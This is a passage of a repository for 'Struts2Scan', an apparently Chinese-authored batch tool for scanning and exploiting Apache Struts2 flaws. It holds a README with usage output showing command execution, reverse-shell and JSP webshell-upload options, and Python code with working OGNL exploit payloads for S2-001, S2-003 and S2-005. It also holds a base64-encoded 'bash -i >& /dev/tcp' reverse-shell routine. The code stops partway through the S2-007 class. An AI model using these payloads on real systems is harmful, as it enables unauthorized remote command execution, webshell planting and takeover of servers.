 10 | + 测试环境: Ubuntu 16.04
 11 | + 漏洞环境已上传，参考地址：
 12 |     + https://github.com/Medicean/VulApps/tree/master/s/struts2/
 13 |     + https://github.com/vulhub/vulhub/tree/master/struts2
 14 | 
 15 | ## 工具参数说明
 16 | ```
 17 | Usage: Struts2Scan.py [OPTIONS]
 18 | 
 19 |   Struts2批量扫描利用工具
 20 | 
 21 | Options:
 22 |   -i, --info          漏洞信息介绍
 23 |   -v, --version       显示工具版本
 24 |   -u, --url TEXT      URL地址
 25 |   -n, --name TEXT     指定漏洞名称, 漏洞名称详见info
 26 |   -f, --file TEXT     批量扫描URL文件, 一行一个URL
 27 |   -d, --data TEXT     POST参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
 28 |   -c, --encode TEXT   页面编码, 默认UTF-8编码
 29 |   -p, --proxy TEXT    HTTP代理. 格式为http://ip:port
 30 |   -t, --timeout TEXT  HTTP超时时间, 默认10s
 31 |   -w, --workers TEXT  批量扫描进程数, 默认为10个进程
 32 |   --header TEXT       HTTP请求头, 格式为: key1=value1&key2=value2
 33 |   -e, --exec          进入命令执行shell
 34 |   --webpath           获取WEB路径
 35 |   -r, --reverse TEXT  反弹shell地址, 格式为ip:port
 36 |   --upfile TEXT       需要上传的文件路径和名称
 37 |   --uppath TEXT       上传的目录和名称, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp
 38 |   -q, --quiet         关闭打印不存在漏洞的输出，只保留存在漏洞的输出
 39 |   -h, --help          Show this message and exit.
 40 | ```
 41 | 
 42 | ## 使用例子
 43 | ### 查看漏洞详细信息:
 44 | ```
 45 | $ python3 Struts2Scan.py --info
 46 | 
 47 |  ____  _              _       ____    ____                  
 48 | / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
 49 | \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
 50 |  ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
 51 | |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
 52 | 
 53 |                                       Author By HatBoy        
 54 | 
 55 | [+] 支持如下Struts2漏洞:
 56 | [+] S2-001:影响版本Struts 2.0.0-2.0.8; POST请求发送数据; 默认参数为:username,password; 支持获取WEB路径,任意命令执行和反弹shell
 57 | [+] S2-003:影响版本Struts 2.0.0-2.0.11.2; GET请求发送数据; 支持任意命令执行
 58 | [+] S2-005:影响版本Struts 2.0.0-2.1.8.1; GET请求发送数据; 支持获取WEB路径,任意命令执行
 59 | [+] S2-007:影响版本Struts 2.0.0-2.2.3; POST请求发送数据; 默认参数为:username,password; 支持任意命令执行和反弹shell
 60 | [+] S2-008:影响版本Struts 2.1.0-2.3.1; GET请求发送数据; 支持任意命令执行和反弹shell
 61 | [+] S2-009:影响版本Struts 2.0.0-2.3.1.1; GET请求发送数据,URL后面需要请求参数名; 默认为: key; 支持任意命令执行和反弹shell
 62 | [+] S2-012:影响版本Struts Showcase App 2.0.0-2.3.13; GET请求发送数据,参数直接添加到URL后面; 默认为:name; 支持任意命令执行和反弹shell
 63 | [+] S2-013/S2-014:影响版本Struts 2.0.0-2.3.14.1; GET请求发送数据; 支持获取WEB路径,任意命令执行,反弹shell和文件上传
 64 | [+] S2-015:影响版本Struts 2.0.0-2.3.14.2; GET请求发送数据; 支持任意命令执行和反弹shell
 65 | [+] S2-016:影响版本Struts 2.0.0-2.3.15; GET请求发送数据; 支持获取WEB路径,任意命令执行,反弹shell和文件上传
 66 | [+] S2-019:影响版本Struts 2.0.0-2.3.15.1; GET请求发送数据; 支持获取WEB路径,任意命令执行,反弹shell和文件上传
 67 | [+] S2-029:影响版本Struts 2.0.0-2.3.24.1(除了2.3.20.3); POST请求发送数据,需要参数; 默认参数:message; 支持任意命令执行和反弹shell
 68 | [+] S2-032:影响版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3); GET请求发送数据; 支持获取WEB路径,任意命令执行和反弹shell
 69 | [+] S2-033:影响版本Struts 2.3.20-2.3.28(除了2.3.20.3和2.3.24.3); GET请求发送数据; 支持任意命令执行和反弹shell
 70 | [+] S2-037:影响版本Struts 2.3.20-2.3.28.1; GET请求发送数据; 支持获取WEB路径,任意命令执行和反弹shell
 71 | [+] S2-045:影响版本Struts 2.3.5-2.3.31,2.5-2.5.10; POST请求发送数据,不需要参数; 支持获取WEB路径,任意命令执行,反弹shell和文件上传
 72 | [+] S2-046:影响版本Struts 2.3.5-2.3.31,2.5-2.5.10; POST请求发送数据,不需要参数; 支持获取WEB路径,任意命令执行,反弹shell和文件上传
 73 | [+] S2-048:影响版本Struts 2.3.x with Struts 1 plugin and Struts 1 action; POST请求发送数据; 默认参数为:username,password; 支持任意命令执行和反弹shell
 74 | [+] S2-053:影响版本Struts 2.0.1-2.3.33,2.5-2.5.10; POST请求发送数据; 默认参数为:username,password; 支持任意命令执行和反弹shell
 75 | [+] S2-devMode:影响版本Struts 2.1.0-2.3.1; GET请求发送数据; 支持获取WEB路径,任意命令执行和反弹shell
 76 | ```
 77 | 
 78 | ### 单个URL漏洞检测:
 79 | ```
 80 | $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action
 81 | 
 82 |  ____  _              _       ____    ____                  
 83 | / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
 84 | \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
 85 |  ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
 86 | |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
 87 | 
 88 |                                       Author By HatBoy        
 89 | 
 90 | [+] 正在扫描URL:http://192.168.100.8:8080/index.action
 91 | [*] ----------------results------------------
 92 | [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-046
 93 | [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-016
 94 | [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-045
 95 | [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-015
 96 | [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-009
 97 | [*] http://192.168.100.8:8080/index.action 存在漏洞: S2-012
 98 | ```
 99 | 
100 | ### 批量漏洞检测:
101 | ```
102 | $ python3 Struts2Scan.py -f urls.txt
103 | ```
104 | 
105 | ### POST数据:
106 | ```
107 | $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -d name=admin&email=admin&age={exp}
108 | ```
109 | 
110 | ### 指定漏洞名称利用:
111 | ```
112 | # 命令执行
113 | $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --exec
114 | 
115 |  ____  _              _       ____    ____                  
116 | / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
117 | \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
118 |  ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
119 | |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
120 | 
121 |                                       Author By HatBoy        
122 | 
123 | >>>ls -la
124 | total 136
125 | drwxr-sr-x 1 root staff  4096 May  5  2017 .
126 | drwxrwsr-x 1 root staff  4096 May  5  2017 ..
127 | -rw-r----- 1 root root  57092 Apr 13  2017 LICENSE
128 | -rw-r----- 1 root root   1723 Apr 13  2017 NOTICE
129 | -rw-r----- 1 root root   7064 Apr 13  2017 RELEASE-NOTES
130 | -rw-r----- 1 root root  15946 Apr 13  2017 RUNNING.txt
131 | drwxr-x--- 1 root root   4096 May  5  2017 bin
132 | drwx--S--- 1 root root   4096 Jul 12 14:54 conf
133 | drwxr-sr-x 3 root staff  4096 May  5  2017 include
134 | drwxr-x--- 2 root root   4096 May  5  2017 lib
135 | drwxr-x--- 1 root root   4096 Jul 12 14:54 logs
136 | drwxr-sr-x 3 root staff  4096 May  5  2017 native-jni-lib
137 | drwxr-x--- 2 root root   4096 May  5  2017 temp
138 | drwxr-x--- 1 root root   4096 Jul 12 14:54 webapps
139 | drwxr-x--- 1 root root   4096 Jul 12 14:54 work
140 | >>>
141 | 
142 | # 反弹shll
143 | $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --reverse 192.168.100.8:8888
144 | 
145 |  ____  _              _       ____    ____                  
146 | / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
147 | \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
148 |  ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
149 | |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
150 | 
151 |                                       Author By HatBoy        
152 | 
153 | [*] 请在反弹地址处监听端口如: nc -lvvp 8080
154 | 
155 | # 获取WEB路径
156 | $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --webpath
157 | 
158 |  ____  _              _       ____    ____                  
159 | / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
160 | \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
161 |  ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
162 | |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
163 | 
164 |                                       Author By HatBoy        
165 | 
166 | [*] /usr/local/tomcat/webapps/ROOT/
167 | 
168 | # 上传shell
169 | $ python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp
170 | 
171 |  ____  _              _       ____    ____                  
172 | / ___|| |_ _ __ _   _| |_ ___|___ \  / ___|  ___ __ _ _ __  
173 | \___ \| __| '__| | | | __/ __| __) | \___ \ / __/ _` | '_ \ 
174 |  ___) | |_| |  | |_| | |_\__ \/ __/   ___) | (_| (_| | | | |
175 | |____/ \__|_|   \__,_|\__|___/_____| |____/ \___\__,_|_| |_|
176 | 
177 |                                       Author By HatBoy        
178 | 
179 | [+] 文件上传成功!
180 | ```
181 | 


--------------------------------------------------------------------------------
/Struts2Scan.py:
--------------------------------------------------------------------------------
   1 | # coding=UTF-8
   2 | 
   3 | import shlex
   4 | import random
   5 | import base64
   6 | import copy
   7 | import os
   8 | import hashlib
   9 | import string
  10 | import click
  11 | import requests
  12 | import urllib.request
  13 | import urllib.parse
  14 | import urllib.error
  15 | import time
  16 | from requests.exceptions import ChunkedEncodingError, ConnectionError, ConnectTimeout
  17 | from urllib.parse import quote, unquote
  18 | from functools import partial
  19 | from bs4 import BeautifulSoup
  20 | from concurrent import futures
  21 | import http.client
  22 | 
  23 | http.client.HTTPConnection._http_vsn = 10
  24 | http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
  25 | 
  26 | __title__ = 'Struts2 Scan'
  27 | __version__ = '0.1'
  28 | __author__ = 'HatBoy'
  29 | 
  30 | """
  31 | 基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具，目前支持的漏洞如下：
  32 | S2-001,S2-003,S2-005,S2-007,S2-008,S2-009,S2-012,S2-013,S2-015,S2-016,S2-019,
  33 | S2-029,S2-032,S2-033,S2-037,S2-045,S2-046,S2-048,S2-052,S2-053,S2-devMode
  34 | """
  35 | 
  36 | default_headers = {
  37 |     'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
  38 | }
  39 | 
  40 | # 全局代理
  41 | proxies = None
  42 | # 超时时间
  43 | _tiemout = 10
  44 | # 默认输出所有结果，包括不存在漏洞的
  45 | is_quiet = False
  46 | # 进程数
  47 | process = 10
  48 | 
  49 | 
  50 | def get(url, headers=None, encoding='UTF-8'):
  51 |     """GET请求发送包装"""
  52 |     try:
  53 |         html = requests.get(url, headers=headers, proxies=proxies, timeout=_tiemout)
  54 |         html = html.content.decode(encoding)
  55 |         return html.replace('\x00', '').strip()
  56 |     except ChunkedEncodingError as e:
  57 |         html = get_stream(url, headers, encoding)
  58 |         return html
  59 |     except ConnectionError as e:
  60 |         return "ERROR:" + "HTTP连接错误"
  61 |     except ConnectTimeout as e:
  62 |         return "ERROR:" + "HTTP连接超时错误"
  63 |     except Exception as e:
  64 |         return 'ERROR:' + str(e)
  65 | 
  66 | 
  67 | def get_302(url, headers=None, encoding='UTF-8'):
  68 |     """GET请求发送包装"""
  69 |     try:
  70 |         html = requests.get(url, headers=headers, proxies=proxies, timeout=_tiemout, allow_redirects=False)
  71 |         status_code = html.status_code
  72 |         if status_code == 302:
  73 |             html = html.headers.get("Location", "")
  74 |         elif status_code == 200:
  75 |             html = html.content.decode(encoding)
  76 |             html = html.replace('\x00', '').strip()
  77 |         else:
  78 |             html = ""
  79 |         return html
  80 |     except ConnectionError as e:
  81 |         return "ERROR:" + "HTTP连接错误"
  82 |     except ConnectTimeout as e:
  83 |         return "ERROR:" + "HTTP连接超时错误"
  84 |     except Exception as e:
  85 |         return 'ERROR:' + str(e)
  86 | 
  87 | 
  88 | def get_stream(url, headers=None, encoding='UTF-8'):
  89 |     """分块接受数据"""
  90 |     try:
  91 |         lines = requests.get(url, headers=headers, timeout=_tiemout, stream=True, proxies=proxies)
  92 |         html = list()
  93 |         for line in lines.iter_lines():
  94 |             if b'\x00' in line:
  95 |                 break
  96 |             line = line.decode(encoding)
  97 |             html.append(line.strip())
  98 |         return '\r\n'.join(html).strip()
  99 |     except ChunkedEncodingError as e:
 100 |         return '\r\n'.join(html).strip()
 101 |     except ConnectionError as e:
 102 |         return "ERROR:" + "HTTP连接错误"
 103 |     except ConnectTimeout as e:
 104 |         return "ERROR:" + "HTTP连接超时错误"
 105 |     except Exception as e:
 106 |         return 'ERROR:' + str(e)
 107 | 
 108 | 
 109 | def post(url, data=None, headers=None, encoding='UTF-8', files=None):
 110 |     """POST请求发送包装"""
 111 |     try:
 112 |         html = requests.post(url, data=data, headers=headers, proxies=proxies, timeout=_tiemout, files=files)
 113 |         html = html.content.decode(encoding)
 114 |         return html.replace('\x00', '').strip()
 115 |     except ChunkedEncodingError as e:
 116 |         html = post_stream(url, data, headers, encoding, files)
 117 |         return html
 118 |     except ConnectionError as e:
 119 |         return "ERROR:" + "HTTP连接错误"
 120 |     except ConnectTimeout as e:
 121 |         return "ERROR:" + "HTTP连接超时错误"
 122 |     except Exception as e:
 123 |         return 'ERROR:' + str(e)
 124 | 
 125 | 
 126 | def post_stream(url, data=None, headers=None, encoding='UTF-8', files=None):
 127 |     """分块接受数据"""
 128 |     try:
 129 |         lines = requests.post(url, data=data, headers=headers, timeout=_tiemout, stream=True, proxies=proxies,
 130 |                               files=None)
 131 |         html = list()
 132 |         for line in lines.iter_lines():
 133 |             line = line.decode(encoding)
 134 |             html.append(line.strip())
 135 |         return '\r\n'.join(html).strip()
 136 |     except ChunkedEncodingError as e:
 137 |         return '\r\n'.join(html).strip()
 138 |     except ConnectionError as e:
 139 |         return "ERROR:" + "HTTP连接错误"
 140 |     except ConnectTimeout as e:
 141 |         return "ERROR:" + "HTTP连接超时错误"
 142 |     except Exception as e:
 143 |         return 'ERROR:' + str(e)
 144 | 
 145 | 
 146 | def encode_multipart(exp):
 147 |     """创建multipart/form-data数据包"""
 148 |     boundary = '----------%s' % hex(int(time.time() * 1000))
 149 |     data = list()
 150 |     data.append('--%s' % boundary)
 151 |     content = b'x'
 152 |     decoded_content = content.decode('ISO-8859-1')
 153 |     data.append('Content-Disposition: form-data; name="test"; filename="{exp}"'.format(exp=exp))
 154 |     data.append('Content-Type: text/plain\r\n')
 155 |     data.append(decoded_content)
 156 |     data.append('--%s--\r\n' % boundary)
 157 |     return '\r\n'.join(data), boundary
 158 | 
 159 | 
 160 | def post_file(url, exp, headers=None, encoding='UTF-8'):
 161 |     """S2-046漏洞专用"""
 162 |     try:
 163 |         coded_params, boundary = encode_multipart(exp)
 164 |         if proxies:
 165 |             proxy_support = urllib.request.ProxyHandler(proxies)
 166 |             opener = urllib.request.build_opener(proxy_support)
 167 |             urllib.request.install_opener(opener)
 168 |         req = urllib.request.Request(url, coded_params.encode('ISO-8859-1'))
 169 |         req.add_header('Content-Type', 'multipart/form-data; boundary=%s' % boundary)
 170 |         if headers:
 171 |             for key, value in headers.items():
 172 |                 req.add_header(key, value)
 173 |         resp = urllib.request.urlopen(req)
 174 |         html = resp.read().decode(encoding)
 175 |         return html
 176 |     except ConnectionError as e:
 177 |         return "ERROR:" + "HTTP连接错误"
 178 |     except ConnectTimeout as e:
 179 |         return "ERROR:" + "HTTP连接超时错误"
 180 |     except Exception as e:
 181 |         return 'ERROR:' + str(e)
 182 | 
 183 | 
 184 | def parse_cmd(cmd, type='string'):
 185 |     """命令解析，将要执行的命令解析为字符串格式"""
 186 |     cmd = shlex.split(cmd)
 187 |     if type == 'string':
 188 |         cmd_str = '"' + '","'.join(cmd) + '"'
 189 |     elif type == 'xml':
 190 |         cmd_str = '<string>' + '</string><string>'.join(cmd) + '</string>'
 191 |     else:
 192 |         cmd_str = cmd
 193 |     return cmd_str
 194 | 
 195 | 
 196 | def parse_headers(headers):
 197 |     """将headers字符串解析为字典"""
 198 |     if not headers:
 199 |         return default_headers
 200 |     new_headers = copy.deepcopy(default_headers)
 201 |     headers = headers.split('&')
 202 |     for header in headers:
 203 |         header = header.split(':')
 204 |         new_headers[header[0].strip()] = header[1].strip()
 205 |     return new_headers
 206 | 
 207 | 
 208 | def get_hash():
 209 |     """获取随机字符串"""
 210 |     letters = string.ascii_letters
 211 |     rand = ''.join(random.sample(letters, 10))
 212 |     hash = hashlib.md5(rand.encode()).hexdigest()
 213 |     return hash
 214 | 
 215 | 
 216 | def echo_check(self):
 217 |     """通过echo输出检查漏洞是否存在"""
 218 |     num1 = random.randint(10000, 100000)
 219 |     num2 = random.randint(10000, 100000)
 220 |     html = self.exec_cmd(f"echo `expr {num1} + {num2}]`")
 221 |     if html.startswith("ERROR:"):
 222 |         return html
 223 |     elif str(num1 + num2) in html:
 224 |         return True
 225 |     else:
 226 |         return False
 227 | 
 228 | 
 229 | def reverse_shell(self, ip, port):
 230 |     """反弹shell"""
 231 |     cmd = "bash -i >& /dev/tcp/{ip}/{port} 0>&1".format(ip=ip, port=port)
 232 |     cmd = base64.b64encode(cmd.encode()).decode()
 233 |     shell = self.shell.replace('SHELL', cmd)
 234 |     html = self.exec_cmd(shell)
 235 |     return html
 236 | 
 237 | 
 238 | def check_file(file_path):
 239 |     """检查文件是否存在"""
 240 |     if os.path.exists(file_path):
 241 |         return True
 242 |     else:
 243 |         click.secho("[ERROR] {file}文件不存在!".format(file=file_path), fg='red')
 244 |         exit(0)
 245 | 
 246 | 
 247 | def read_file(file_path, encoding='UTF-8'):
 248 |     """读文件，默认使用UTF-8编码"""
 249 |     if check_file(file_path):
 250 |         with open(file_path, 'r', encoding=encoding) as f:
 251 |             data = f.read()
 252 |         return data
 253 | 
 254 | 
 255 | def read_urls(file):
 256 |     """读取URL文件"""
 257 |     if check_file(file):
 258 |         with open(file, 'r', encoding='UTF-8') as f:
 259 |             urls = f.readlines()
 260 |         urls = [url.strip() for url in urls if url and url.strip()]
 261 |         return urls
 262 | 
 263 | 
 264 | def check_int(name, t):
 265 |     """检查int变量"""
 266 |     try:
 267 |         t = int(t)
 268 |         return t
 269 |     except Exception as e:
 270 |         click.secho("[ERROR] 参数{name}必须为整数!".format(name=name), fg='red')
 271 |         exit(0)
 272 | 
 273 | 
 274 | class S2_001:
 275 |     """S2-001漏洞检测利用类"""
 276 |     info = "[+] S2-001:影响版本Struts 2.0.0-2.0.8; POST请求发送数据; 默认参数为:username,password; 支持获取WEB路径,任意命令执行和反弹shell"
 277 |     check_poc = "%25%7B{num1}%2B{num2}%7D"
 278 |     web_path = "%25%7B%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23response%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23response.println(%23req.getRealPath('%2F'))%2C%23response.flush()%2C%23response.close()%7D"
 279 |     exec_payload = "%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B{cmd}%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D"
 280 |     shell = "bash -c {echo,SHELL}|{base64,-d}|{bash,-i}"
 281 | 
 282 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 283 |         self.url = url
 284 |         if not data:
 285 |             self.data = "username=test&password={exp}"
 286 |         else:
 287 |             self.data = data
 288 |         self.headers = parse_headers(headers)
 289 |         self.encoding = encoding
 290 |         self.is_vul = False
 291 |         if 'Content-Type' not in self.headers:
 292 |             self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
 293 | 
 294 |     def check(self):
 295 |         """检测漏洞是否存在"""
 296 |         num1 = random.randint(10000, 100000)
 297 |         num2 = random.randint(10000, 100000)
 298 |         poc = self.check_poc.format(num1=num1, num2=num2)
 299 |         data = self.data.format(exp=poc)
 300 |         html = post(self.url, data, self.headers, self.encoding)
 301 |         nn = str(num1 + num2)
 302 |         if html.startswith("ERROR:"):
 303 |             return html
 304 |         elif nn in html:
 305 |             self.is_vul = True
 306 |             return 'S2-001'
 307 |         return self.is_vul
 308 | 
 309 |     def get_path(self):
 310 |         """获取web目录"""
 311 |         data = self.data.format(exp=self.web_path)
 312 |         html = post(self.url, data, self.headers, self.encoding)
 313 |         return html
 314 | 
 315 |     def exec_cmd(self, cmd):
 316 |         """执行命令"""
 317 |         cmd = parse_cmd(cmd)
 318 |         data = self.data.format(exp=self.exec_payload.format(cmd=quote(cmd)))
 319 |         html = post(self.url, data, self.headers, self.encoding)
 320 |         return html
 321 | 
 322 |     def reverse_shell(self, ip, port):
 323 |         """反弹shell"""
 324 |         html = reverse_shell(self, ip, port)
 325 |         return html
 326 | 
 327 | 
 328 | class S2_003:
 329 |     """S2-003漏洞检测利用类"""
 330 |     info = "[+] S2-003:影响版本Struts 2.0.0-2.0.11.2; GET请求发送数据; 支持任意命令执行"
 331 |     exec_payload = "%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27{cmd}%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte[51020]%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29"
 332 | 
 333 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 334 |         self.url = url
 335 |         self.headers = parse_headers(headers)
 336 |         self.encoding = encoding
 337 |         self.is_vul = False
 338 | 
 339 |     def check(self):
 340 |         """检测漏洞是否存在"""
 341 |         html = echo_check(self)
 342 |         if str(html).startswith("ERROR:"):
 343 |             return html
 344 |         if html:
 345 |             self.is_vul = True
 346 |             return 'S2-003'
 347 |         return self.is_vul
 348 | 
 349 |     def exec_cmd(self, cmd):
 350 |         """执行命令"""
 351 |         payload = self.exec_payload.format(cmd=quote(cmd))
 352 |         html = get(self.url + '?' + payload, self.headers, self.encoding)
 353 |         return html
 354 | 
 355 | 
 356 | class S2_005:
 357 |     """S2-005漏洞检测利用类"""
 358 |     info = "[+] S2-005:影响版本Struts 2.0.0-2.1.8.1; GET请求发送数据; 支持获取WEB路径,任意命令执行"
 359 |     web_path = "%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%5C75@org.apache.struts2.ServletActionContext@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%28%5C43req.getRealPath%28%22%5Cu005c%22%29%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29"
 360 |     exec_payload1 = "%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27{cmd}%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte[51020]%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29"
 361 |     exec_payload2 = "%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27{cmd}%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte[51020]%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29"
 362 | 
 363 |     def __init__(self, url, data=None, headers=None, encoding="UTF-8"):
 364 |         self.url = url
 365 |         self.headers = parse_headers(headers)
 366 |         self.encoding = encoding
 367 |         self.is_vul = False
 368 | 
 369 |     def check(self):
 370 |         """选择可以利用成功的payload"""
 371 |         self.exec_payload = self.exec_payload1
 372 |         html = echo_check(self)
 373 |         if str(html).startswith("ERROR:"):
 374 |             return html
 375 |         if html:
 376 |             self.is_vul = True
 377 |             return 'S2-005'
 378 |         else:
 379 |             self.exec_payload = self.exec_payload2
 380 |             html = echo_check(self)
 381 |             if str(html).startswith("ERROR:"):
 382 |                 return html
 383 |             if html:
 384 |                 self.is_vul = True
 385 |                 return 'S2-005'
 386 |         return self.is_vul
 387 | 
 388 |     def get_path(self):
 389 |         """获取web目录"""
 390 |         html = get(self.url + '?' + self.web_path, self.headers, self.encoding)
 391 |         return html
 392 | 
 393 |     def exec_cmd(self, cmd):
 394 |         """执行命令"""
 395 |         payload = self.exec_payload.format(cmd=quote(cmd))
 396 |         html = get_stream(self.url + '?' + payload, self.headers, self.encoding)
 397 |         return html
 398 | 
 399 | 
 400 | class S2_007:
 401 |     """S2-007漏洞检测利用类"""
 402 |     info = "[+] S2-007:影响版本Struts 2.0.0-2.2.3; POST请求发送数据; 默认参数为:username,password; 支持任意命令执行和反弹shell"
